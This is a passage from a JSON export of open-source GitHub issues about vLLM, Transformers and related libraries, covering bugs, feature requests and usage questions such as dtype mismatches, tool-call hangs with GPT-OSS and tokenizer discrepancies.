[x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30121", "state": "open", "labels": [ "feature request" ], "created_at": "2025-12-05T08:13:46Z", "updated_at": "2025-12-08T04:31:05Z", "comments": 4, "user": "moshilangzi" }, { "repo": "huggingface/transformers", "number": 42641, "title": "Cannot inference llava-next with transformers==4.57.1 on dtype=\"auto\" bug", "body": "### System Info\n\n```\n- `transformers` version: 4.57.1\n- Platform: Linux-5.15.0-161-generic-x86_64-with-glibc2.35\n- Python version: 3.10.12\n- Huggingface_hub version: 0.35.3\n- Safetensors version: 0.6.2\n- Accelerate version: 1.10.1\n- Accelerate config: not found\n- DeepSpeed version: not installed\n- PyTorch version (accelerator?): 2.8.0+cpu (NA)\n- Tensorflow version (GPU?): 2.18.0 (False)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: \n```\n\n### Who can help?\n\n@zucchini-nlp \n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [x] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n```\nfrom transformers import LlavaNextProcessor, LlavaNextForConditionalGeneration\nimport torch\nfrom PIL import Image\nimport requests\n\nprocessor = LlavaNextProcessor.from_pretrained(\"llava-hf/llava-v1.6-mistral-7b-hf\")\n\nmodel = LlavaNextForConditionalGeneration.from_pretrained(\"llava-hf/llava-v1.6-mistral-7b-hf\", dtype=\"auto\", low_cpu_mem_usage=True) \n\n# prepare image and text prompt, using the 
appropriate prompt template\nurl = \"https://github.com/haotian-liu/LLaVA/blob/1a91fc274d7c35a9b50b3cb29c4247ae5837ce39/images/llava_v1_5_radar.jpg?raw=true\"\nimage = Image.open(requests.get(url, stream=True).raw)\n\n# Define a chat history and use `apply_chat_template` to get correctly formatted prompt\n# Each value in \"content\" has to be a list of dicts with types (\"text\", \"image\") \nconversation = [\n {\n\n \"role\": \"user\",\n \"content\": [\n {\"type\": \"text\", \"text\": \"What is shown in this image?\"},\n {\"type\": \"image\"},\n ],\n },\n]\nprompt = processor.apply_chat_template(conversation, add_generation_prompt=True)\n\ninputs = processor(images=image, text=prompt, return_tensors=\"pt\")\n\n# autoregressively complete prompt\noutput = model.generate(**inputs, max_new_tokens=100)\n\nprint(processor.decode(output[0], skip_special_tokens=True))\n```\n\n### Expected behavior\n\nI am encountering an issue when attempting to run inference on LLaVA-Next models (e.g., `llava-hf/llava-v1.6-mistral-7b-hf`) using `transformers==4.57.1` and setting `dtype=\"auto\"` when loading the model.\n\nThe issue stems from the model's `config.json` having different `torch_dtype` values for the overall model and the text configuration:\n\n```\n\"text_config\": {\n \"_name_or_path\": \"mistralai/Mistral-7B-Instruct-v0.2\",\n // ... other config values\n \"torch_dtype\": \"bfloat16\",\n \"vocab_size\": 32064\n },\n \"torch_dtype\": \"float16\",\n```\n\nWhen the model is loaded with `dtype=\"auto\"`, each submodule (the visual model and the text model) seems to load with its respective `torch_dtype` (`\"float16\"` and `\"bfloat16\"`).\n\nThis difference in data types then causes an error during inference, specifically within the `forward` pass of the `LlavaNextForConditionalGeneration` model:\n\n```\nFile \"MY_ENV/.venv/lib/python3.10/site-packages/transformers/models/llava_next/modeling_llava_next.py\", line 687, in forward\n    logits = self.lm_head(hidden_states[:, slice_indices, :])\n  File \"MY_ENV/.venv/lib/python3.10/site-packages/torch/nn/modules/module.py\", line 1773, in _wrapped_call_impl\n    return self._call_impl(*args, **kwargs)\n  File \"MY_ENV/.venv/lib/python3.10/site-packages/torch/nn/modules/module.py\", line 1784, in _call_impl\n    return forward_call(*args, **kwargs)\n  File \"MY_ENV/.venv/lib/python3.10/site-packages/torch/nn/modules/linear.py\", line 125, in forward\n    return F.linear(input, self.weight, self.bias)\nRuntimeError: expected m1 and m2 to have the same dtype, but got: c10::BFloat16 != c10::Half\n```\n\nThis `RuntimeError` indicates a dtype mismatch, likely between the linear layer's weight (from `self.lm_head`) and the input tensor (`hidden_states`), which results from the different dtypes loaded by `dtype=\"auto\"` for `self.lm_head` and `self.model`.\n\nIs there a plan to support loading LLaVA-Next models with `dtype=\"auto\"` given their current configuration structure?", "url": "https://github.com/huggingface/transformers/issues/42641", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-05T04:39:35Z", "updated_at": "2025-12-23T11:08:56Z", "comments": 5, "user": "rebel-seinpark" }, { "repo": "vllm-project/vllm", "number": 30098, "title": "[Doc]: Misleading Logic & 
Docstring in `block_quant_to_tensor_quant` (Block FP8)", "body": "### \ud83d\udcda The doc issue\n\nThe docstring and implementation of the `block_quant_to_tensor_quant` function have a critical mismatch regarding the dequantization process, leading to numerical errors when used outside of specific fused kernel backends.\n\n### Problematic Function\n\nThe function is currently implemented as:\n\n```python\ndef block_quant_to_tensor_quant(\n    x_q_block: torch.Tensor,\n    x_s: torch.Tensor,\n) -> tuple[torch.Tensor, torch.Tensor]:\n    \"\"\"This function converts block-wise quantization to tensor-wise\n    quantization. The inputs are block-wise quantization tensor `x_q_block`,\n    block-wise quantization scale and the block size.\n    The outputs are tensor-wise quantization tensor and tensor-wise\n    quantization scale. Note only float8 is supported for now.\n    \"\"\"\n    x_dq_block = group_broadcast(x_q_block, x_s)\n    x_q_tensor, scale = input_to_float8(x_dq_block, dtype=x_q_block.dtype)\n    return x_q_tensor, scale\n```\n\n### Observation and Impact\n- vLLM migrated the actual 'block quant to tensor quant' operation to the kernel but kept this method. The docstring is misleading since in this method there is no scale.\n- Misleading Docstring: The docstring claims the function performs \"conversion\" and takes the \"scale,\" implying a complete process. However, the output `x_dq_block` is an un-dequantized value with a broadcasted shape.\n\n### Suggest a potential alternative/fix\n\nThe function should either be documented clearly as a kernel preparation helper OR refactored to ensure numerical correctness when used as a conversion API.\n\n**1. Fix Documentation/Name (If intent is kernel prep):**\n* Rename the function to something like `_prepare_block_quant_for_fused_kernel`.\n* Add a warning that this function does not perform dequantization.\n\n**2. Implement Safe Logic Dispatch (If intent is a robust conversion API):**\nThe function should dynamically dispatch to the known-good, safe path if the specific fused kernel (that handles the $X_q \\times X_s$ multiplication) is not guaranteed to be active.\n\nThe safe logic is in v0.9.2:\n```python\n# Safe path required for correctness on general backends\nx_dq_block = scaled_dequantize(x_q_block, x_s) \nx_q_tensor, scale = input_to_float8(x_dq_block, dtype=x_q_block.dtype)\n```\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30098", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-12-05T02:12:07Z", "updated_at": "2025-12-24T17:22:50Z", "comments": 0, "user": "xqoasis" }, { "repo": "huggingface/transformers", "number": 42638, "title": "Routing Replay for MoEs", "body": "### Feature request\n\nRecent RL approaches for training MoE models increasingly rely on **Routing Replay**, as described in the following papers:\n\n- https://huggingface.co/papers/2507.18071\n- https://huggingface.co/papers/2510.11370\n- https://huggingface.co/papers/2512.01374\n\nWithout going into the training details, Routing Replay requires the ability to override the router during the forward pass, that is, to force the model to use a predefined set of router logits rather than computing new ones. 
This enables deterministic reproduction of expert selection.\n\nAFAICT, Transformers currently does not expose a way to override router logits or manually control expert selection at inference/training time.\n\nI imagine something along the following lines (minimal example):\n\n```python\nfrom transformers import AutoModelForCausalLM\nimport torch\n\nmodel = AutoModelForCausalLM.from_pretrained(\"Qwen/Qwen3-30B-A3B-Instruct-2507\", device_map=\"auto\", dtype=\"auto\")\n\ninput_ids = torch.tensor([[1, 2, 3, 4]], device=\"cuda\")\n\n# Standard forward pass, retrieving router logits\noutputs = model(input_ids, output_router_logits=True)\n\n# Forward pass with router logits injected (enabling Routing Replay)\nmodel(input_ids, router_logits=outputs.router_logits)\n```\n\n## Alternative\n\nIf we decide not to implement this feature, it would be nice to provide an example showing how to _patch_ a MoE to enable this.\n\n### Motivation\n\nSee above.\n\n### Your contribution\n\nI think I can do it.", "url": "https://github.com/huggingface/transformers/issues/42638", "state": "open", "labels": [ "Feature request" ], "created_at": "2025-12-04T23:58:14Z", "updated_at": "2025-12-05T16:29:05Z", "comments": 2, "user": "qgallouedec" }, { "repo": "vllm-project/vllm", "number": 30084, "title": "[Performance]: Should I expect linear scaling with pure DP?", "body": "### Proposal to improve performance\n\n_No response_\n\n### Report of performance regression\n\n_No response_\n\n### Misc discussion on performance\n\nI decided to benchmark a pure-DP vLLM 0.11.2 deployment of Qwen/Qwen2.5-32B-Instruct (before benchmarking DP+EP with Qwen/Qwen3-30B-A3B-Instruct-2507), comparing DP1 vs DP8 (H200):\n\nDP1 deployment:\n```\nvllm serve ${MODEL_NAME} \\\n --port 8000 \\\n --trust-remote-code\n```\n\nDP8 deployment:\n```\nvllm serve ${MODEL_NAME} \\\n --port 8000 \\\n --trust-remote-code \\\n --data-parallel-size 8 \\\n --data-parallel-size-local 8\n```\n\nMy benchmark roughly looks like this:\n```\nfor rate in [10, 20, ... 100, 200, ... 1000, 2000, ... 100000]:\n vllm bench serve \\\n --host \"$HOST\" \\\n --model Qwen/Qwen2.5-32B-Instruct \\\n --dataset-name random \\\n --random-input-len 128 \\\n --random-output-len 128 \\\n --num-prompts 10000 \\\n --request-rate \"$rate\" \\\n --ignore-eos\n```\nShould I expect ~8x scaling? 
Results show only ~4x (duration, request throughput, token throughput, etc.)\n\n\"Image\"\n\ncc @KeitaW @amanshanbhag\n\n### Your current environment (if you think it is necessary)\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30084", "state": "open", "labels": [ "performance" ], "created_at": "2025-12-04T19:52:45Z", "updated_at": "2025-12-16T04:09:24Z", "comments": 7, "user": "pbelevich" }, { "repo": "vllm-project/vllm", "number": 30082, "title": "[Usage]: Turn off reasoning for Kimi-K2-Thinking?", "body": "### Your current environment\n\n\n\n```text\nOutput of collect_env.py-\n\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\nClang version : Could not collect\nCMake version : version 4.1.3\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu129\nIs debug build : False\nCUDA used to build PyTorch : 12.9\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.12 (main, Oct 10 2025, 08:52:57) [GCC 11.4.0] (64-bit runtime)\nPython platform : Linux-4.18.0-553.56.1.el8_10.x86_64-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.9.86\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : \nGPU 0: NVIDIA H200\nGPU 1: NVIDIA H200\nGPU 2: NVIDIA H200\nGPU 3: NVIDIA H200\nGPU 4: NVIDIA H200\nGPU 5: NVIDIA H200\nGPU 6: NVIDIA H200\nGPU 7: NVIDIA H200\n\nNvidia driver version : 550.163.01\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 46 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 192\nOn-line CPU(s) list: 0-191\nVendor ID: GenuineIntel\nModel name: Intel(R) Xeon(R) Platinum 8468\nCPU family: 6\nModel: 143\nThread(s) per core: 2\nCore(s) per socket: 48\nSocket(s): 2\nStepping: 8\nCPU max MHz: 3800.0000\nCPU min MHz: 800.0000\nBogoMIPS: 4200.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 invpcid_single cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect avx_vnni avx512_bf16 wbnoinvd dtherm ida arat 
pln pts avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq la57 rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm md_clear serialize tsxldtrk pconfig arch_lbr amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities\nL1d cache: 4.5 MiB (96 instances)\nL1i cache: 3 MiB (96 instances)\nL2 cache: 192 MiB (96 instances)\nL3 cache: 210 MiB (2 instances)\nNUMA node(s): 8\nNUMA node0 CPU(s): 0-11,96-107\nNUMA node1 CPU(s): 12-23,108-119\nNUMA node2 CPU(s): 24-35,120-131\nNUMA node3 CPU(s): 36-47,132-143\nNUMA node4 CPU(s): 48-59,144-155\nNUMA node5 CPU(s): 60-71,156-167\nNUMA node6 CPU(s): 72-83,168-179\nNUMA node7 CPU(s): 84-95,180-191\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spect", "url": "https://github.com/vllm-project/vllm/issues/30082", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-04T19:32:13Z", "updated_at": "2025-12-08T23:02:58Z", "comments": 2, "user": "vikrantdeshpande09876" }, { "repo": "vllm-project/vllm", "number": 30075, "title": "[Feature]: Default eplb num_redundant_experts to the lowest valid value if unspecified", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nEPLB requires the number of experts to be chosen up front, and there is a known minimum valid value that can be derived from the vLLM startup configuration. Since extra EPLB experts trade KV-cache memory for potential performance improvements that are not guaranteed to pay off, having the EPLB value default to the minimum valid value would reduce friction when enabling EPLB for the first time, until users are ready to tune.\n\nAs a consequence, it would also streamline templating the same config to work across multiple EP sizes for the default case.\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30075", "state": "open", "labels": [ "help wanted", "good first issue", "feature request" ], "created_at": "2025-12-04T18:19:03Z", "updated_at": "2025-12-20T21:00:23Z", "comments": 4, "user": "smarterclayton" }, { "repo": "vllm-project/vllm", "number": 30058, "title": "[Feature]: Multi-Adapter Support for Embed Qwen3 8B Embedding Model", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nHi Team, do we currently have multi-adapter (LoRA) support for embedding models, specifically the Qwen3 8B Embedding model? If not, when can we expect the support? 
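\n\nFor reference, here is roughly how multi-LoRA is wired up for generation models today (just a sketch: the adapter names and paths below are made up, and whether embedding models accept these flags at all is exactly what I am asking):\n\n```bash\n# Hypothetical adapters; --enable-lora / --lora-modules are the existing generation-model flags\nvllm serve Qwen/Qwen3-Embedding-8B \\\n --enable-lora \\\n --lora-modules adapter-a=/path/to/adapter_a adapter-b=/path/to/adapter_b\n```\n\nA request would then select an adapter by passing its name in the `model` field.\n\n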
Thanks :)\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30058", "state": "open", "labels": [ "feature request" ], "created_at": "2025-12-04T12:05:15Z", "updated_at": "2025-12-04T19:42:04Z", "comments": 4, "user": "dawnik17" }, { "repo": "huggingface/accelerate", "number": 3873, "title": "How to specify accelerate launch yaml config item when running with torchrun", "body": "I've read the doc [Launching Accelerate scripts](https://huggingface.co/docs/accelerate/basic_tutorials/launch), and would like to launch with torchrun. However, the doc does not mention how to specify configs like `distributed_type` when using torchrun.\n\nWhat are the equivalents of these configurations when using torchrun?", "url": "https://github.com/huggingface/accelerate/issues/3873", "state": "open", "labels": [], "created_at": "2025-12-04T07:27:43Z", "updated_at": "2026-01-03T15:07:19Z", "user": "WhoisZihan" }, { "repo": "huggingface/lerobot", "number": 2580, "title": "How can the leader arm be synchronized to follow the follower arm during inference?", "body": "", "url": "https://github.com/huggingface/lerobot/issues/2580", "state": "open", "labels": [], "created_at": "2025-12-04T07:22:07Z", "updated_at": "2025-12-11T02:53:11Z", "user": "zhoushaoxiang" }, { "repo": "vllm-project/vllm", "number": 30023, "title": "[Feature]: Support qwen3next with GGUF?", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nWith v0.11.0, `vllm` reports:\n\n```\nvllm | (APIServer pid=1) ValueError: GGUF model with architecture qwen3next is not supported yet.\n```\n\nhttps://huggingface.co/Qwen/Qwen3-Next-80B-A3B-Thinking-GGUF\n\n\nI did some digging: vLLM supports Qwen3-Next under the architecture name `qwen3_next`, but Qwen set it to `qwen3next` in the GGUF metadata.\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30023", "state": "open", "labels": [ "feature request" ], "created_at": "2025-12-04T03:40:26Z", "updated_at": "2025-12-18T05:31:57Z", "comments": 0, "user": "zeerd" }, { "repo": "vllm-project/vllm", "number": 29998, "title": "[Bug]: cannot send two POSTs to the /v1/chat/completions endpoint with an identical tool function name with model GPT-OSS-120B", "body": "### Your current environment\n\n
\nThe bug is reproducible with docker image vllm/vllm-openai:v0.12.0\n\n```yaml\nservices:\n vllm-gptoss-large:\n image: vllm/vllm-openai:v0.12.0\n restart: always\n shm_size: '64gb'\n deploy:\n resources:\n reservations:\n devices:\n - driver: nvidia\n device_ids: ['0', '1']\n capabilities: [gpu]\n volumes:\n - ./data/hf:/data\n environment:\n - HF_TOKEN=${HF_TOKEN}\n ports:\n - 8000:8000\n command: [\"openai/gpt-oss-120b\",\n \"--tool-call-parser\",\"openai\",\n \"--enable-auto-tool-choice\",\n \"--reasoning-parser\",\"openai_gptoss\",\n \"--tensor-parallel-size\",\"2\",\n \"--port\",\"8000\",\n \"--api-key\", \"${VLLM_API_KEY}\",\n \"--download_dir\", \"/data\"]\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nThis bash script cannot be executed a second time unless the function name is changed to a value that has not been sent before. Without a tool definition, the POST can be sent as often as you like.\n\n```bash\n#!/bin/bash\ncurl -X POST http://localhost:8000/v1/chat/completions \\\n -H \"Authorization: Bearer ${VLLM_API_KEY}\" \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"model\": \"openai/gpt-oss-120b\",\n \"stream\": false,\n \"messages\": [\n {\n \"role\": \"system\",\n \"content\": \"Be a helpful assistant.\"\n },\n {\n \"role\": \"user\",\n \"content\": \"Hi\"\n },\n {\n \"role\": \"assistant\",\n \"content\": \"How can I help you?\"\n },\n {\n \"role\": \"user\",\n \"content\": \"Do you like Monty Python?\"\n }\n ],\n \"tools\": [\n {\n \"type\": \"function\",\n \"function\": {\n \"name\": \"CHANGE-NAME-BEFORE-SENDING\",\n \"description\": \"Use this tool if you need to extract information from a website.\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"url\": {\n \"type\": \"string\",\n \"description\": \"The URL to search or extract information from.\"\n }\n },\n \"required\": [\"url\"]\n }\n }\n }\n ]\n }'\n\n```\n\nThe script never finishes waiting for a response, and `nvidia-smi` shows the cards consuming max power. The vLLM logs show that tokens are being generated, so from an external point of view the LLM seems to generate tokens without stopping.\n\n\"Image\"\n\nThis is quite weird, because when you call it with the Python SDK, it works fine, e.g.\n\n```python\nfrom openai import OpenAI\nfrom dotenv import load_dotenv\nimport os\n\nload_dotenv()\n\nclient = OpenAI(\n api_key=os.getenv(\"API_KEY\"),\n base_url=\"http://localhost:8000/v1\",\n)\n\ntools = [{\n \"type\": \"function\",\n \"function\": {\n \"name\": \"get_weather\",\n \"description\": \"Get the current weather in a given location\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"location\": {\"type\": \"string\"},\n \"description\": \"Location and state, e.g., 'San Francisco, CA'\"\n },\n \"required\": [\"location\"]\n },\n },\n }\n]\n\nresponse = client.chat.completions.create(\n model=\"openai/gpt-oss-120b\",\n messages=[{\"role\": \"user\", \"content\": \"How is the weather in Berlin? use the tool get_weather.\"}],\n tools=tools,\n tool_choice=\"auto\",\n stream=False\n)\n\nprint(response.choices[0].message)\n```\n\nIn fact, this can also be reproduced using n8n AI Agent nodes, which are based on the TypeScript LangGraph implementation: https://github.com/n8n-io/n8n/blob/master/packages/%40n8n/nodes-langchain/nodes/agents/Agent/agents/ToolsAgent/V1/execute.ts#L34\n\nHere you can also see that chat windows freeze when a tool is attached and a user asks the second question.\n\nThe bug really seems to be related to this model, because I tested Mistral and Qwen models and couldn't reproduce it. When I tried to debug the issue, there was a sensitivity to the description field in the parameters list of the tool. 
To make it clear, this can also only be sent once using the OpenAI Python SDK, but works again when the function name is changed:\n\n```python\nfrom openai import OpenAI\nfrom dotenv import load_dotenv\nimport os\n\nload_dotenv()\n\nclient = OpenAI(\n api_key=os.getenv(\"API_KEY\"),\n base_url=f\"https://{os.getenv('API_DOMAIN')}/v1\",\n)\n\ntools = [{\n \"type\": \"function\",\n \"function\": {\n \"name\": \"get_weather\",\n \"description\": \"Get the current weather in a given location\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"location\": {\n \"type\": \"string\", \n \"description\": \"Location and state, e.g., 'San Francisco, CA'\"\n },\n },\n \"required\": [\"locatio", "url": "https://github.com/vllm-project/vllm/issues/29998", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-03T21:41:35Z", "updated_at": "2025-12-19T15:53:43Z", "comments": 14, "user": "pd-t" }, { "repo": "huggingface/transformers", "number": 42589, "title": "Incorrect tokenization `tokenizers` for escaped strings / Mismatch with `mistral_common`", "body": "### System Info\n\n```\nIn [3]: mistral_common.__version__\nOut[3]: '1.8.6'\n```\n\n```\nIn [4]: import transformers; transformers.__version__\nOut[4]: '5.0.0.dev0'\n```\n\n```\nIn [5]: import tokenizers; tokenizers.__version__\nOut[5]: '0.22.1'\n```\n\n### Who can help?\n\n@ArthurZucker @itazap \n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n```py\nfrom transformers import AutoTokenizer\nfrom mistral_common.tokens.tokenizers.mistral import MistralTokenizer\nfrom mistral_common.protocol.instruct.request import ChatCompletionRequest\n\nreq = ChatCompletionRequest(messages=[\n {'role': 'system', 'content': ''},\n {'role': 'user', 'content': 'hey'},\n {'role': 'assistant', 'content': 'ju\\x16'},\n {'role': 'user', 'content': 'hey'},\n])\n\ntokenizer_orig = MistralTokenizer.from_hf_hub(\"mistralai/Ministral-3-3B-Instruct-2512\")\ntokenizer_hf = AutoTokenizer.from_pretrained(\"mistralai/Ministral-3-3B-Instruct-2512\")\n\norig_tokens = tokenizer_orig.encode_chat_completion(req).tokens\norig_text = tokenizer_orig.encode_chat_completion(req).text\n\nprint(\"Expected\")\nprint(orig_text)\nprint(orig_tokens)\n\nhf_tokens = tokenizer_hf.apply_chat_template(req.to_openai()[\"messages\"])\nhf_text = tokenizer_hf.convert_ids_to_tokens(hf_tokens)\n\nprint(\"HF\")\nprint(hf_tokens)\nprint(hf_text)\n```\n\ngives:\n\n```\nExpected\n[SYSTEM_PROMPT][/SYSTEM_PROMPT][INST]hey[/INST]ju[INST]hey[/INST]\n[1, 17, 18, 3, 74058, 4, 5517, 1022, 2, 3, 74058, 4]\nHF\n[1, 17, 18, 3, 74058, 4, 5517, 1022, 1032, 2, 3, 74058, 4]\n['', '[SYSTEM_PROMPT]', '[/SYSTEM_PROMPT]', '[INST]', 'hey', '[/INST]', 'ju', '\u0116', '\u0120', '', '[INST]', 'hey', '[/INST]']\n```\n\nAs you can see the token `1032` should not be there. I'm not sure exactly what is happening and it could very well be that the behavior of `tokenizers` makes sense here. 
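\n\nA quick way to narrow this down (untested sketch, same model as above): encode the assistant turn's content on its own, to check whether the extra token also appears outside the chat template:\n\n```py\nfrom transformers import AutoTokenizer\n\ntok = AutoTokenizer.from_pretrained(\"mistralai/Ministral-3-3B-Instruct-2512\")\n# Encode just the raw assistant content containing the control character\nids = tok.encode(\"ju\x16\", add_special_tokens=False)\nprint(ids, tok.convert_ids_to_tokens(ids))\n```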
\n\n**However**, this is a mismatch with `mistral_common`, which means that any such tokenization will give slightly different token IDs, leading to slightly incorrect results, since all Mistral models are trained with `mistral_common`.\n\nThis is especially important for \"long-log\" parsing tasks that often have escaped strings.\n\nIt's definitely an edge case, but it would still be very nice to fix.\n\n### Expected behavior\n\nAlign encoding.", "url": "https://github.com/huggingface/transformers/issues/42589", "state": "closed", "labels": [ "bug" ], "created_at": "2025-12-03T10:57:35Z", "updated_at": "2025-12-16T10:45:35Z", "comments": 5, "user": "patrickvonplaten" }, { "repo": "huggingface/diffusers", "number": 12781, "title": "Impossible to log into Huggingface/Diffusers Discord", "body": "### Describe the bug\n\nWhen trying to verify my Discord/Huggingface account, no matter what I do, I end up with this message: \n\"Image\"\n\nHas the HF Discord died? If that is the case, what alternatives are there? \n\nI feel that there is a strong need for some kind of forum where Diffusers users can collaborate on figuring out how to make newly supported, very large models run on consumer hardware. The Diffusers discussion on GitHub is dead. So, where do we go?\n\n### Reproduction\n\nTry to log in to Discord. \n\n### Logs\n\n```shell\n-\n```\n\n### System Info\n\n-\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/12781", "state": "closed", "labels": [ "bug" ], "created_at": "2025-12-03T09:42:55Z", "updated_at": "2025-12-04T15:11:42Z", "comments": 4, "user": "tin2tin" }, { "repo": "vllm-project/vllm", "number": 29944, "title": "[Usage]: It seems that the prefix cache has not brought about any performance benefits.", "body": "### Your current environment\n\n```\nroot@ubuntu:/vllm-workspace# python3 collect_env.py\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\nClang version : Could not collect\nCMake version : version 4.1.0\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.11 (main, Jun 4 2025, 08:56:18) [GCC 11.4.0] (64-bit runtime)\nPython platform : Linux-5.15.0-25-generic-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration :\nGPU 0: NVIDIA H20\nGPU 1: NVIDIA H20\nGPU 2: NVIDIA H20\nGPU 3: NVIDIA H20\nGPU 4: NVIDIA H20\nGPU 5: NVIDIA H20\nGPU 6: NVIDIA H20\nGPU 7: NVIDIA H20\n\nNvidia driver version : 550.127.08\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 224\nOn-line CPU(s) list: 0-223\nVendor ID: GenuineIntel\nModel name: Intel(R) Xeon(R) Platinum 8480+\nCPU family: 6\nModel: 143\nThread(s) per core: 2\nCore(s) per socket: 56\nSocket(s): 2\nStepping: 
